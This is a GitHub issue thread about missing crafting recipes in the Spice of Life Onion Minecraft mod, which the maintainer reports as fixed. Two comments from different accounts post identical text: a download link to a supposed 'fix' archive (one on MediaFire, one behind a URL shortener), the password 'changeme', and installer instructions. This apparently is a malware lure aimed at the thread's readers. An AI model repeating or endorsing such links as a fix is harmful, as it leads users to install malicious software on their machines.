### ISSUE TITLE
[Neoforge 1.21.1] Unable to craft SoLO Items

### ISSUE THREAD

**Issue by FynnWaelsing** [CreativeMD/Spice-of-Life-Onion#29]
SoLO version: Spice of Life Onion_NEOFORGE_v1.2.10_mc1.21.1
Neoforge version: 21.1.28

I am unable to craft any of the SoLO items (Food book, the various lunchboxes). These items can be cheated in using Creative or the JEI cheat function, but no recipes for them appear in either the vanilla recipe book or through JEI. I noticed this on my regular instance, and then double-checked on a minimal instance with just SoLO and had the same result.

**Comment by marcosj046** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by CreativeMD** [comment]
Fixed in the newest version. Thanks for reporting this issue!

**Comment by khazenor** [comment]
I'm on version "Spice of Life Onion_NEOFORGE_v1.2.9_mc1.21" and it seems like the items are still not craftable?  At least I was not able to look them up using JEI.

**Comment by khazenor** [comment]
oh wait.  Just realized that the post is for 1.21.1
